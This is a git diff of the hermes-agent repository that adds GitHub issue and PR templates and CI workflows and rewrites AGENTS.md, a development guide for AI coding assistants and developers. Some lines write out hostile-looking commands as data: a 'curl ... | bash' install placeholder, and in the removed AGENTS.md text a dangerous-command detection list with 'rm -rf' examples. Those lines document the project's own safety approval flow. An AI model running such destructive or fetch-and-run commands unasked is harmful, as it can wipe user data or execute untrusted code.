@@ -0,0 +1,11 @@
blank_issues_enabled: true
contact_links:
- name: 💬 Nous Research Discord
url: https://discord.gg/NousResearch
about: For quick questions, showcasing projects, sharing skills, and community chat.
- name: 📖 Documentation
url: https://github.com/NousResearch/hermes-agent/blob/main/README.md
about: Check the README and docs before opening an issue.
- name: 🤝 Contributing Guide
url: https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md
about: Read this before submitting a PR.

View File

@@ -0,0 +1,73 @@
name: "✨ Feature Request"
description: Suggest a new feature or improvement.
title: "[Feature]: "
labels: ["enhancement"]
body:
- type: markdown
attributes:
value: |
Thanks for the suggestion! Before submitting, please consider:
- **Is this a new skill?** Most capabilities should be [skills, not tools](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#should-it-be-a-skill-or-a-tool). If it's a specialized integration (crypto, NFT, niche SaaS), it belongs on the Skills Hub, not bundled.
- **Search [existing issues](https://github.com/NousResearch/hermes-agent/issues)** — someone may have already proposed this.
- type: textarea
id: problem
attributes:
label: Problem or Use Case
description: What problem does this solve? What are you trying to do that you can't today?
placeholder: |
I'm trying to use Hermes with [provider/platform/workflow] but currently
there's no way to...
validations:
required: true
- type: textarea
id: solution
attributes:
label: Proposed Solution
description: How do you think this should work? Be as specific as you can — CLI flags, config options, UI behavior.
placeholder: |
Add a `--foo` flag to `hermes chat` that enables...
Or: Add a config key `bar.baz` that controls...
validations:
required: true
- type: textarea
id: alternatives
attributes:
label: Alternatives Considered
description: What other approaches did you consider? Why is the proposed solution better?
- type: dropdown
id: type
attributes:
label: Feature Type
options:
- New tool
- New bundled skill
- CLI improvement
- Gateway / messaging improvement
- Configuration option
- Performance / reliability
- Developer experience (tests, docs, CI)
- Other
validations:
required: true
- type: dropdown
id: scope
attributes:
label: Scope
description: How big is this change?
options:
- Small (single file, < 50 lines)
- Medium (few files, < 300 lines)
- Large (new module or significant refactor)
- type: checkboxes
id: pr-ready
attributes:
label: Contribution
options:
- label: I'd like to implement this myself and submit a PR

100
.github/ISSUE_TEMPLATE/setup_help.yml vendored Normal file
View File

@@ -0,0 +1,100 @@
name: "🔧 Setup / Installation Help"
description: Having trouble installing or configuring Hermes? Ask here.
title: "[Setup]: "
labels: ["setup"]
body:
- type: markdown
attributes:
value: |
Sorry you're having trouble! Please fill out the details below so we can help.
**Quick checks first:**
- Run `hermes doctor` and include the output below
- Try `hermes update` to get the latest version
- Check the [README troubleshooting section](https://github.com/NousResearch/hermes-agent#troubleshooting)
- For general questions, consider the [Nous Research Discord](https://discord.gg/NousResearch) for faster help
- type: textarea
id: description
attributes:
label: What's Going Wrong?
description: Describe what you're trying to do and where it fails.
placeholder: |
I ran `hermes setup` and selected Nous Portal, but when I try to
start the gateway I get...
validations:
required: true
- type: textarea
id: steps
attributes:
label: Steps Taken
description: What did you do? Include the exact commands you ran.
placeholder: |
1. Ran the install script: `curl -fsSL ... | bash`
2. Ran `hermes setup` and chose "Quick setup"
3. Selected OpenRouter, entered API key
4. Ran `hermes chat` and got error...
validations:
required: true
- type: dropdown
id: install-method
attributes:
label: Installation Method
options:
- Install script (curl | bash)
- Manual clone + pip/uv install
- PowerShell installer (Windows)
- Docker
- Other
validations:
required: true
- type: input
id: os
attributes:
label: Operating System
placeholder: Ubuntu 24.04 / macOS 15.2 / Windows 11
validations:
required: true
- type: input
id: python-version
attributes:
label: Python Version
description: Output of `python --version` (or `python3 --version`)
placeholder: "3.11.9"
- type: input
id: hermes-version
attributes:
label: Hermes Version
description: Output of `hermes version` (if install got that far)
placeholder: "2.1.0"
- type: textarea
id: doctor-output
attributes:
label: Output of `hermes doctor`
description: Run `hermes doctor` and paste the full output. This will be auto-formatted.
render: shell
- type: textarea
id: error-output
attributes:
label: Full Error Output
description: Paste the complete error message or traceback. This will be auto-formatted.
render: shell
validations:
required: true
- type: textarea
id: tried
attributes:
label: What I've Already Tried
description: List any fixes or workarounds you've already attempted.
placeholder: |
- Ran `hermes update`
- Tried reinstalling with `pip install -e ".[all]"`
- Checked that OPENROUTER_API_KEY is set in ~/.hermes/.env

75
.github/PULL_REQUEST_TEMPLATE.md vendored Normal file
View File

@@ -0,0 +1,75 @@
## What does this PR do?
<!-- Describe the change clearly. What problem does it solve? Why is this approach the right one? -->
## Related Issue
<!-- Link the issue this PR addresses. If no issue exists, consider creating one first. -->
Fixes #
## Type of Change
<!-- Check the one that applies. -->
- [ ] 🐛 Bug fix (non-breaking change that fixes an issue)
- [ ] ✨ New feature (non-breaking change that adds functionality)
- [ ] 🔒 Security fix
- [ ] 📝 Documentation update
- [ ] ✅ Tests (adding or improving test coverage)
- [ ] ♻️ Refactor (no behavior change)
- [ ] 🎯 New skill (bundled or hub)
## Changes Made
<!-- List the specific changes. Include file paths for code changes. -->
-
## How to Test
<!-- Steps to verify this change works. For bugs: reproduction steps + proof that the fix works. -->
1.
2.
3.
## Checklist
<!-- Complete these before requesting review. -->
### Code
- [ ] I've read the [Contributing Guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md)
- [ ] My commit messages follow [Conventional Commits](https://www.conventionalcommits.org/) (`fix(scope):`, `feat(scope):`, etc.)
- [ ] I searched for [existing PRs](https://github.com/NousResearch/hermes-agent/pulls) to make sure this isn't a duplicate
- [ ] My PR contains **only** changes related to this fix/feature (no unrelated commits)
- [ ] I've run `pytest tests/ -q` and all tests pass
- [ ] I've added tests for my changes (required for bug fixes, strongly encouraged for features)
- [ ] I've tested on my platform: <!-- e.g. Ubuntu 24.04, macOS 15.2, Windows 11 -->
### Documentation & Housekeeping
<!-- Check all that apply. It's OK to check "N/A" if a category doesn't apply to your change. -->
- [ ] I've updated relevant documentation (README, `docs/`, docstrings) — or N/A
- [ ] I've updated `cli-config.yaml.example` if I added/changed config keys — or N/A
- [ ] I've updated `CONTRIBUTING.md` or `AGENTS.md` if I changed architecture or workflows — or N/A
- [ ] I've considered cross-platform impact (Windows, macOS) per the [compatibility guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#cross-platform-compatibility) — or N/A
- [ ] I've updated tool descriptions/schemas if I changed tool behavior — or N/A
## For New Skills
<!-- Only fill this out if you're adding a skill. Delete this section otherwise. -->
- [ ] This skill is **broadly useful** to most users (if bundled) — see [Contributing Guide](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#should-the-skill-be-bundled)
- [ ] SKILL.md follows the [standard format](https://github.com/NousResearch/hermes-agent/blob/main/CONTRIBUTING.md#skillmd-format) (frontmatter, trigger conditions, steps, pitfalls)
- [ ] No external dependencies that aren't already available (prefer stdlib, curl, existing Hermes tools)
- [ ] I've tested the skill end-to-end: `hermes --toolsets skills -q "Use the X skill to do Y"`
## Screenshots / Logs
<!-- If applicable, add screenshots or log output showing the fix/feature in action. -->

60
.github/workflows/deploy-site.yml vendored Normal file
View File

@@ -0,0 +1,60 @@
name: Deploy Site
on:
push:
branches: [main]
paths:
- 'website/**'
- 'landingpage/**'
- '.github/workflows/deploy-site.yml'
workflow_dispatch:
permissions:
pages: write
id-token: write
concurrency:
group: pages
cancel-in-progress: false
jobs:
build-and-deploy:
runs-on: ubuntu-latest
environment:
name: github-pages
url: ${{ steps.deploy.outputs.page_url }}
steps:
- uses: actions/checkout@v4
- uses: actions/setup-node@v4
with:
node-version: 20
cache: npm
cache-dependency-path: website/package-lock.json
- name: Install dependencies
run: npm ci
working-directory: website
- name: Build Docusaurus
run: npm run build
working-directory: website
- name: Stage deployment
run: |
mkdir -p _site/docs
# Landing page at root
cp -r landingpage/* _site/
# Docusaurus at /docs/
cp -r website/build/* _site/docs/
# CNAME so GitHub Pages keeps the custom domain between deploys
echo "hermes-agent.nousresearch.com" > _site/CNAME
- name: Upload artifact
uses: actions/upload-pages-artifact@v3
with:
path: _site
- name: Deploy to GitHub Pages
id: deploy
uses: actions/deploy-pages@v4

42
.github/workflows/tests.yml vendored Normal file
View File

@@ -0,0 +1,42 @@
name: Tests
on:
push:
branches: [main]
pull_request:
branches: [main]
# Cancel in-progress runs for the same PR/branch
concurrency:
group: tests-${{ github.ref }}
cancel-in-progress: true
jobs:
test:
runs-on: ubuntu-latest
timeout-minutes: 10
steps:
- name: Checkout code
uses: actions/checkout@v4
- name: Install uv
uses: astral-sh/setup-uv@v5
- name: Set up Python 3.11
run: uv python install 3.11
- name: Install dependencies
run: |
uv venv .venv --python 3.11
source .venv/bin/activate
uv pip install -e ".[all,dev]"
- name: Run tests
run: |
source .venv/bin/activate
python -m pytest tests/ -q --ignore=tests/integration --tb=short
env:
# Ensure tests don't accidentally call real APIs
OPENROUTER_API_KEY: ""
OPENAI_API_KEY: ""
NOUS_API_KEY: ""

29
.gitignore vendored
View File

@@ -1,7 +1,5 @@
/venv/
/_pycache/
hecate/
hecate-lib/
*.pyc*
__pycache__/
.venv/
@@ -47,26 +45,7 @@ testlogs
# CLI config (may contain sensitive SSH paths)
cli-config.yaml
.DS_Store
# artifacts
*.jsonl
*.html
*.json
*.log
*.csv
# Singularity/Apptainer images (large binary files)
*.sif
# Test files
test_singularity_*.py
test_*.py
!tests/test_*.py
# Nomad data
/tmp/NomadClient*/
*.egg-info*
wandb
logs
# Skills Hub state (lives in ~/.hermes/skills/.hub/ at runtime, but just in case)
skills/.hub/
ignored/
.worktrees/

615
AGENTS.md
View File

@@ -1,533 +1,242 @@
# Hermes Agent - Development Guide
Instructions for AI coding assistants (GitHub Copilot, Cursor, etc.) and human developers.
Hermes-Agent is an AI agent harness with tool-calling capabilities, interactive CLI, messaging integrations, and scheduled tasks.
Instructions for AI coding assistants and developers working on the hermes-agent codebase.
## Development Environment
**IMPORTANT**: Always use the virtual environment if it exists:
```bash
source venv/bin/activate # Before running any Python commands
source .venv/bin/activate # ALWAYS activate before running Python
```
## Project Structure
```
hermes-agent/
├── hermes_cli/ # Unified CLI commands
├── main.py # Entry point, command dispatcher
├── setup.py # Interactive setup wizard
├── config.py # Config management & migration
├── status.py # Status display
│ ├── doctor.py # Diagnostics
│ ├── gateway.py # Gateway management
│ ├── uninstall.py # Uninstaller
── cron.py # Cron job management
├── tools/ # Tool implementations
├── gateway/ # Messaging platform adapters
├── cron/ # Scheduler implementation
├── skills/ # Knowledge documents
├── cli.py # Interactive CLI (Rich UI)
├── run_agent.py # Agent runner with AIAgent class
├── model_tools.py # Tool schemas and handlers
├── toolsets.py # Tool groupings
├── toolset_distributions.py # Probability-based tool selection
├── run_agent.py # AIAgent class — core conversation loop
├── model_tools.py # Tool orchestration, _discover_tools(), handle_function_call()
├── toolsets.py # Toolset definitions, _HERMES_CORE_TOOLS list
├── cli.py # HermesCLI class — interactive CLI orchestrator
├── hermes_state.py # SessionDB — SQLite session store (FTS5 search)
├── agent/ # Agent internals
│ ├── prompt_builder.py # System prompt assembly
│ ├── context_compressor.py # Auto context compression
── prompt_caching.py # Anthropic prompt caching
│ ├── auxiliary_client.py # Auxiliary LLM client (vision, summarization)
│ ├── model_metadata.py # Model context lengths, token estimation
│ ├── display.py # KawaiiSpinner, tool preview formatting
├── skill_commands.py # Skill slash commands (shared CLI/gateway)
│ └── trajectory.py # Trajectory saving helpers
├── hermes_cli/ # CLI subcommands and setup
├── main.py # Entry point — all `hermes` subcommands
│ ├── config.py # DEFAULT_CONFIG, OPTIONAL_ENV_VARS, migration
│ ├── commands.py # Slash command definitions + SlashCommandCompleter
│ ├── callbacks.py # Terminal callbacks (clarify, sudo, approval)
│ └── setup.py # Interactive setup wizard
├── tools/ # Tool implementations (one file per tool)
│ ├── registry.py # Central tool registry (schemas, handlers, dispatch)
│ ├── approval.py # Dangerous command detection
│ ├── terminal_tool.py # Terminal orchestration
│ ├── process_registry.py # Background process management
│ ├── file_tools.py # File read/write/search/patch
│ ├── web_tools.py # Firecrawl search/extract
│ ├── browser_tool.py # Browserbase browser automation
│ ├── code_execution_tool.py # execute_code sandbox
│ ├── delegate_tool.py # Subagent delegation
│ ├── mcp_tool.py # MCP client (~1050 lines)
│ └── environments/ # Terminal backends (local, docker, ssh, modal, daytona, singularity)
├── gateway/ # Messaging platform gateway
│ ├── run.py # Main loop, slash commands, message dispatch
│ ├── session.py # SessionStore — conversation persistence
│ └── platforms/ # Adapters: telegram, discord, slack, whatsapp, homeassistant, signal
├── cron/ # Scheduler (jobs.py, scheduler.py)
├── environments/ # RL training environments (Atropos)
├── tests/ # Pytest suite (~2500+ tests)
└── batch_runner.py # Parallel batch processing
```
**User Configuration** (stored in `~/.hermes/`):
- `~/.hermes/config.yaml` - Settings (model, terminal, toolsets, etc.)
- `~/.hermes/.env` - API keys and secrets
**User config:** `~/.hermes/config.yaml` (settings), `~/.hermes/.env` (API keys)
## File Dependency Chain
```
tools/*.py → tools/__init__.py → model_tools.py → toolsets.py → toolset_distributions.py
run_agent.py ──────────────────────────┘
cli.py → run_agent.py (uses AIAgent with quiet_mode=True)
batch_runner.py → run_agent.py + toolset_distributions.py
tools/registry.py (no deps — imported by all tool files)
tools/*.py (each calls registry.register() at import time)
model_tools.py (imports tools/registry + triggers tool discovery)
run_agent.py, cli.py, batch_runner.py, environments/
```
Always ensure consistency between tools, model_tools.py, and toolsets.py when changing any of them.
---
## AIAgent Class
The main agent is implemented in `run_agent.py`:
## AIAgent Class (run_agent.py)
```python
class AIAgent:
def __init__(
self,
model: str = "anthropic/claude-sonnet-4",
api_key: str = None,
base_url: str = "https://openrouter.ai/api/v1",
max_iterations: int = 60, # Max tool-calling loops
def __init__(self,
model: str = "anthropic/claude-opus-4.6",
max_iterations: int = 90,
enabled_toolsets: list = None,
disabled_toolsets: list = None,
verbose_logging: bool = False,
quiet_mode: bool = False, # Suppress progress output
tool_progress_callback: callable = None, # Called on each tool use
):
# Initialize OpenAI client, load tools based on toolsets
...
def chat(self, user_message: str, task_id: str = None) -> str:
# Main entry point - runs the agent loop
...
quiet_mode: bool = False,
save_trajectories: bool = False,
platform: str = None, # "cli", "telegram", etc.
session_id: str = None,
skip_context_files: bool = False,
skip_memory: bool = False,
# ... plus provider, api_mode, callbacks, routing params
): ...
def chat(self, message: str) -> str:
"""Simple interface — returns final response string."""
def run_conversation(self, user_message: str, system_message: str = None,
conversation_history: list = None, task_id: str = None) -> dict:
"""Full interface — returns dict with final_response + messages."""
```
### Agent Loop
The core loop in `_run_agent_loop()`:
```
1. Add user message to conversation
2. Call LLM with tools
3. If LLM returns tool calls:
- Execute each tool
- Add tool results to conversation
- Go to step 2
4. If LLM returns text response:
- Return response to user
```
The core loop is inside `run_conversation()` — entirely synchronous:
```python
while turns < max_turns:
response = client.chat.completions.create(
model=model,
messages=messages,
tools=tool_schemas,
)
while api_call_count < self.max_iterations and self.iteration_budget.remaining > 0:
response = client.chat.completions.create(model=model, messages=messages, tools=tool_schemas)
if response.tool_calls:
for tool_call in response.tool_calls:
result = await execute_tool(tool_call)
result = handle_function_call(tool_call.name, tool_call.args, task_id)
messages.append(tool_result_message(result))
turns += 1
api_call_count += 1
else:
return response.content
```
### Conversation Management
Messages are stored as a list of dicts following OpenAI format:
```python
messages = [
{"role": "system", "content": "You are a helpful assistant..."},
{"role": "user", "content": "Search for Python tutorials"},
{"role": "assistant", "content": None, "tool_calls": [...]},
{"role": "tool", "tool_call_id": "...", "content": "..."},
{"role": "assistant", "content": "Here's what I found..."},
]
```
### Reasoning Model Support
For models that support chain-of-thought reasoning:
- Extract `reasoning_content` from API responses
- Store in `assistant_msg["reasoning"]` for trajectory export
- Pass back via `reasoning_content` field on subsequent turns
Messages follow OpenAI format: `{"role": "system/user/assistant/tool", ...}`. Reasoning content is stored in `assistant_msg["reasoning"]`.
---
## CLI Architecture (cli.py)
The interactive CLI uses:
- **Rich** - For the welcome banner and styled panels
- **prompt_toolkit** - For fixed input area with history and `patch_stdout`
- **KawaiiSpinner** (in run_agent.py) - Animated feedback during API calls and tool execution
Key components:
- `HermesCLI` class - Main CLI controller with commands and conversation loop
- `load_cli_config()` - Loads config, sets environment variables for terminal
- `build_welcome_banner()` - Displays ASCII art logo, tools, and skills summary
- `/commands` - Process user commands like `/help`, `/clear`, `/personality`, etc.
CLI uses `quiet_mode=True` when creating AIAgent to suppress verbose logging.
- **Rich** for banner/panels, **prompt_toolkit** for input with autocomplete
- **KawaiiSpinner** (`agent/display.py`) — animated faces during API calls, `┊` activity feed for tool results
- `load_cli_config()` in cli.py merges hardcoded defaults + user config YAML
- `process_command()` is a method on `HermesCLI` (not in commands.py)
- Skill slash commands: `agent/skill_commands.py` scans `~/.hermes/skills/`, injects as **user message** (not system prompt) to preserve prompt caching
### Adding CLI Commands
1. Add to `COMMANDS` dict with description
2. Add handler in `process_command()` method
3. For persistent settings, use `save_config_value()` to update config
---
## Hermes CLI Commands
The unified `hermes` command provides all functionality:
| Command | Description |
|---------|-------------|
| `hermes` | Interactive chat (default) |
| `hermes chat -q "..."` | Single query mode |
| `hermes setup` | Configure API keys and settings |
| `hermes config` | View current configuration |
| `hermes config edit` | Open config in editor |
| `hermes config set KEY VAL` | Set a specific value |
| `hermes config check` | Check for missing config |
| `hermes config migrate` | Prompt for missing config interactively |
| `hermes status` | Show configuration status |
| `hermes doctor` | Diagnose issues |
| `hermes update` | Update to latest (checks for new config) |
| `hermes uninstall` | Uninstall (can keep configs for reinstall) |
| `hermes gateway` | Start messaging gateway |
| `hermes cron list` | View scheduled jobs |
| `hermes version` | Show version info |
---
## Messaging Gateway
The gateway connects Hermes to Telegram, Discord, and WhatsApp.
### Configuration (in `~/.hermes/.env`):
```bash
# Telegram
TELEGRAM_BOT_TOKEN=123456:ABC-DEF... # From @BotFather
TELEGRAM_ALLOWED_USERS=123456789,987654 # Comma-separated user IDs (from @userinfobot)
# Discord
DISCORD_BOT_TOKEN=MTIz... # From Developer Portal
DISCORD_ALLOWED_USERS=123456789012345678 # Comma-separated user IDs
# Agent Behavior
HERMES_MAX_ITERATIONS=60 # Max tool-calling iterations
MESSAGING_CWD=/home/myuser # Terminal working directory for messaging
# Tool Progress (optional)
HERMES_TOOL_PROGRESS=true # Send progress messages
HERMES_TOOL_PROGRESS_MODE=new # "new" or "all"
```
### Working Directory Behavior
- **CLI (`hermes` command)**: Uses current directory (`.``os.getcwd()`)
- **Messaging (Telegram/Discord)**: Uses `MESSAGING_CWD` (default: home directory)
This is intentional: CLI users are in a terminal and expect the agent to work in their current directory, while messaging users need a consistent starting location.
### Security (User Allowlists):
**IMPORTANT**: Without an allowlist, anyone who finds your bot can use it!
The gateway checks `{PLATFORM}_ALLOWED_USERS` environment variables:
- If set: Only listed user IDs can interact with the bot
- If unset: All users are allowed (dangerous with terminal access!)
Users can find their IDs:
- **Telegram**: Message [@userinfobot](https://t.me/userinfobot)
- **Discord**: Enable Developer Mode, right-click name → Copy ID
### Tool Progress Notifications
When `HERMES_TOOL_PROGRESS=true`, the bot sends status messages as it works:
- `💻 \`ls -la\`...` (terminal commands show the actual command)
- `🔍 web_search...`
- `📄 web_extract...`
Modes:
- `new`: Only when switching to a different tool (less spam)
- `all`: Every single tool call
### Typing Indicator
The gateway keeps the "typing..." indicator active throughout processing, refreshing every 4 seconds. This lets users know the bot is working even during long tool-calling sequences.
### Platform Toolsets:
Each platform has a dedicated toolset in `toolsets.py`:
- `hermes-telegram`: Full tools including terminal (with safety checks)
- `hermes-discord`: Full tools including terminal
- `hermes-whatsapp`: Full tools including terminal
---
## Configuration System
Configuration files are stored in `~/.hermes/` for easy user access:
- `~/.hermes/config.yaml` - All settings (model, terminal, compression, etc.)
- `~/.hermes/.env` - API keys and secrets
### Adding New Configuration Options
When adding new configuration variables, you MUST follow this process:
#### For config.yaml options:
1. Add to `DEFAULT_CONFIG` in `hermes_cli/config.py`
2. **CRITICAL**: Bump `_config_version` in `DEFAULT_CONFIG` when adding required fields
3. This triggers migration prompts for existing users on next `hermes update` or `hermes setup`
Example:
```python
DEFAULT_CONFIG = {
# ... existing config ...
"new_feature": {
"enabled": True,
"option": "default_value",
},
# BUMP THIS when adding required fields
"_config_version": 2, # Was 1, now 2
}
```
#### For .env variables (API keys/secrets):
1. Add to `REQUIRED_ENV_VARS` or `OPTIONAL_ENV_VARS` in `hermes_cli/config.py`
2. Include metadata for the migration system:
```python
OPTIONAL_ENV_VARS = {
# ... existing vars ...
"NEW_API_KEY": {
"description": "What this key is for",
"prompt": "Display name in prompts",
"url": "https://where-to-get-it.com/",
"tools": ["tools_it_enables"], # What tools need this
"password": True, # Mask input
},
}
```
#### Update related files:
- `hermes_cli/setup.py` - Add prompts in the setup wizard
- `cli-config.yaml.example` - Add example with comments
- Update README.md if user-facing
### Config Version Migration
The system uses `_config_version` to detect outdated configs:
1. `check_for_missing_config()` compares user config to `DEFAULT_CONFIG`
2. `migrate_config()` interactively prompts for missing values
3. Called automatically by `hermes update` and optionally by `hermes setup`
---
## Environment Variables
API keys are loaded from `~/.hermes/.env`:
- `OPENROUTER_API_KEY` - Main LLM API access (primary provider)
- `FIRECRAWL_API_KEY` - Web search/extract tools
- `BROWSERBASE_API_KEY` / `BROWSERBASE_PROJECT_ID` - Browser automation
- `FAL_KEY` - Image generation (FLUX model)
- `NOUS_API_KEY` - Vision and Mixture-of-Agents tools
Terminal tool configuration (in `~/.hermes/config.yaml`):
- `terminal.backend` - Backend: local, docker, singularity, modal, or ssh
- `terminal.cwd` - Working directory for CLI ("." = current directory)
- `terminal.docker_image` - Image for Docker backend
- `terminal.singularity_image` - Image for Singularity backend
- `terminal.modal_image` - Image for Modal backend
- SSH: `TERMINAL_SSH_HOST`, `TERMINAL_SSH_USER`, `TERMINAL_SSH_KEY` in .env
Agent behavior (in `~/.hermes/.env`):
- `HERMES_MAX_ITERATIONS` - Max tool-calling iterations (default: 60)
- `MESSAGING_CWD` - Working directory for messaging platforms (default: ~)
- `HERMES_TOOL_PROGRESS` - Enable tool progress messages (`true`/`false`)
- `HERMES_TOOL_PROGRESS_MODE` - Progress mode: `new` (tool changes) or `all`
### Dangerous Command Approval
The terminal tool includes safety checks for potentially destructive commands (e.g., `rm -rf`, `DROP TABLE`, `chmod 777`, etc.):
**Behavior by Backend:**
- **Docker/Singularity/Modal**: Commands run unrestricted (isolated containers)
- **Local/SSH**: Dangerous commands trigger approval flow
**Approval Flow (CLI):**
```
⚠️ Potentially dangerous command detected: recursive delete
rm -rf /tmp/test
[o]nce | [s]ession | [a]lways | [d]eny
Choice [o/s/a/D]:
```
**Approval Flow (Messaging):**
- Command is blocked with explanation
- Agent explains the command was blocked for safety
- User must add the pattern to their allowlist via `hermes config edit` or run the command directly on their machine
**Configuration:**
- `command_allowlist` in `~/.hermes/config.yaml` stores permanently allowed patterns
- Add patterns via "always" approval or edit directly
**Sudo Handling (Messaging):**
- If sudo fails over messaging, output includes tip to add `SUDO_PASSWORD` to `~/.hermes/.env`
1. Add to `COMMANDS` dict in `hermes_cli/commands.py`
2. Add handler in `HermesCLI.process_command()` in `cli.py`
3. For persistent settings, use `save_config_value()` in `cli.py`
---
## Adding New Tools
Follow this strict order to maintain consistency:
1. Create `tools/your_tool.py` with:
- Handler function (sync or async) returning a JSON string via `json.dumps()`
- `check_*_requirements()` function to verify dependencies (e.g., API keys)
- Schema definition following OpenAI function-calling format
2. Export in `tools/__init__.py`:
- Import the handler and check function
- Add to `__all__` list
3. Register in `model_tools.py`:
- Add to `TOOLSET_REQUIREMENTS` if it needs API keys
- Create `get_*_tool_definitions()` function or add to existing
- Add routing in `handle_function_call()` dispatcher
- Update `get_all_tool_names()` with the tool name
- Update `get_toolset_for_tool()` mapping
- Update `get_available_toolsets()` and `check_toolset_requirements()`
4. Add to toolset in `toolsets.py`:
- Add to existing toolset or create new one in TOOLSETS dict
5. If the tool requires an API key:
- Add to `OPTIONAL_ENV_VARS` in `hermes_cli/config.py`
- The tool will be auto-disabled if the key is missing
6. Optionally add to `toolset_distributions.py` for batch processing
### Tool Implementation Pattern
Requires changes in **3 files**:
**1. Create `tools/your_tool.py`:**
```python
# tools/example_tool.py
import json
import os
import json, os
from tools.registry import registry
def check_example_requirements() -> bool:
"""Check if required API keys/dependencies are available."""
def check_requirements() -> bool:
return bool(os.getenv("EXAMPLE_API_KEY"))
def example_tool(param: str, task_id: str = None) -> str:
"""Execute the tool and return JSON string result."""
try:
result = {"success": True, "data": "..."}
return json.dumps(result, ensure_ascii=False)
except Exception as e:
return json.dumps({"error": str(e)}, ensure_ascii=False)
return json.dumps({"success": True, "data": "..."})
registry.register(
name="example_tool",
toolset="example",
schema={"name": "example_tool", "description": "...", "parameters": {...}},
handler=lambda args, **kw: example_tool(param=args.get("param", ""), task_id=kw.get("task_id")),
check_fn=check_requirements,
requires_env=["EXAMPLE_API_KEY"],
)
```
All tool handlers MUST return a JSON string. Never return raw dicts.
**2. Add import** in `model_tools.py` `_discover_tools()` list.
### Dynamic Tool Availability
**3. Add to `toolsets.py`** — either `_HERMES_CORE_TOOLS` (all platforms) or a new toolset.
Tools are automatically disabled when their API keys are missing:
The registry handles schema collection, dispatch, availability checking, and error wrapping. All handlers MUST return a JSON string.
```python
# In model_tools.py
TOOLSET_REQUIREMENTS = {
"web": {"env_vars": ["FIRECRAWL_API_KEY"]},
"browser": {"env_vars": ["BROWSERBASE_API_KEY", "BROWSERBASE_PROJECT_ID"]},
"creative": {"env_vars": ["FAL_KEY"]},
}
```
The `check_tool_availability()` function determines which tools to include.
### Stateful Tools
Tools that maintain state (terminal, browser) require:
- `task_id` parameter for session isolation between concurrent tasks
- `cleanup_*()` function to release resources
- Cleanup is called automatically in run_agent.py after conversation completes
**Agent-level tools** (todo, memory): intercepted by `run_agent.py` before `handle_function_call()`. See `todo_tool.py` for the pattern.
---
## Trajectory Format
## Adding Configuration
Conversations are saved in ShareGPT format for training:
```json
{"from": "system", "value": "System prompt with <tools>...</tools>"}
{"from": "human", "value": "User message"}
{"from": "gpt", "value": "<think>reasoning</think>\n<tool_call>{...}</tool_call>"}
{"from": "tool", "value": "<tool_response>{...}</tool_response>"}
{"from": "gpt", "value": "Final response"}
```
Tool calls use `<tool_call>` XML tags, responses use `<tool_response>` tags, reasoning uses `<think>` tags.
### Trajectory Export
### config.yaml options:
1. Add to `DEFAULT_CONFIG` in `hermes_cli/config.py`
2. Bump `_config_version` (currently 5) to trigger migration for existing users
### .env variables:
1. Add to `OPTIONAL_ENV_VARS` in `hermes_cli/config.py` with metadata:
```python
agent = AIAgent(save_trajectories=True)
agent.chat("Do something")
# Saves to trajectories/*.jsonl in ShareGPT format
"NEW_API_KEY": {
"description": "What it's for",
"prompt": "Display name",
"url": "https://...",
"password": True,
"category": "tool", # provider, tool, messaging, setting
},
```
### Config loaders (two separate systems):
| Loader | Used by | Location |
|--------|---------|----------|
| `load_cli_config()` | CLI mode | `cli.py` |
| `load_config()` | `hermes tools`, `hermes setup` | `hermes_cli/config.py` |
| Direct YAML load | Gateway | `gateway/run.py` |
---
## Batch Processing (batch_runner.py)
## Important Policies
For processing multiple prompts:
- Parallel execution with multiprocessing
- Content-based resume for fault tolerance (matches on prompt text, not indices)
- Toolset distributions control probabilistic tool availability per prompt
- Output: `data/<run_name>/trajectories.jsonl` (combined) + individual batch files
### Prompt Caching Must Not Break
Hermes-Agent ensures caching remains valid throughout a conversation. **Do NOT implement changes that would:**
- Alter past context mid-conversation
- Change toolsets mid-conversation
- Reload memories or rebuild system prompts mid-conversation
Cache-breaking forces dramatically higher costs. The ONLY time we alter context is during context compression.
### Working Directory Behavior
- **CLI**: Uses current directory (`.``os.getcwd()`)
- **Messaging**: Uses `MESSAGING_CWD` env var (default: home directory)
---
## Known Pitfalls
### DO NOT use `simple_term_menu` for interactive menus
Rendering bugs in tmux/iTerm2 — ghosting on scroll. Use `curses` (stdlib) instead. See `hermes_cli/tools_config.py` for the pattern.
### DO NOT use `\033[K` (ANSI erase-to-EOL) in spinner/display code
Leaks as literal `?[K` text under `prompt_toolkit`'s `patch_stdout`. Use space-padding: `f"\r{line}{' ' * pad}"`.
### `_last_resolved_tool_names` is a process-global in `model_tools.py`
When subagents overwrite this global, `execute_code` calls after delegation may fail with missing tool imports. Known bug.
### Tests must not write to `~/.hermes/`
The `_isolate_hermes_home` autouse fixture in `tests/conftest.py` redirects `HERMES_HOME` to a temp dir. Never hardcode `~/.hermes/` paths in tests.
---
## Testing
```bash
python batch_runner.py \
--dataset_file=prompts.jsonl \
--batch_size=20 \
--num_workers=4 \
--run_name=my_run
source .venv/bin/activate
python -m pytest tests/ -q # Full suite (~2500 tests, ~2 min)
python -m pytest tests/test_model_tools.py -q # Toolset resolution
python -m pytest tests/test_cli_init.py -q # CLI config loading
python -m pytest tests/gateway/ -q # Gateway tests
python -m pytest tests/tools/ -q # Tool-level tests
```
---
## Skills System
Skills are on-demand knowledge documents the agent can load. Located in `skills/` directory:
```
skills/
├── mlops/ # Category folder
│ ├── axolotl/ # Skill folder
│ │ ├── SKILL.md # Main instructions (required)
│ │ ├── references/ # Additional docs, API specs
│ │ └── templates/ # Output formats, configs
│ └── vllm/
│ └── SKILL.md
└── example-skill/
└── SKILL.md
```
**Progressive disclosure** (token-efficient):
1. `skills_categories()` - List category names (~50 tokens)
2. `skills_list(category)` - Name + description per skill (~3k tokens)
3. `skill_view(name)` - Full content + tags + linked files
SKILL.md files use YAML frontmatter:
```yaml
---
name: skill-name
description: Brief description for listing
tags: [tag1, tag2]
related_skills: [other-skill]
version: 1.0.0
---
# Skill Content...
```
Tool files: `tools/skills_tool.py``model_tools.py``toolsets.py`
---
## Testing Changes
After making changes:
1. Run `hermes doctor` to check setup
2. Run `hermes config check` to verify config
3. Test with `hermes chat -q "test message"`
4. For new config options, test fresh install: `rm -rf ~/.hermes && hermes setup`
Always run the full suite before pushing changes.

522
CONTRIBUTING.md Normal file
View File

@@ -0,0 +1,522 @@
# Contributing to Hermes Agent
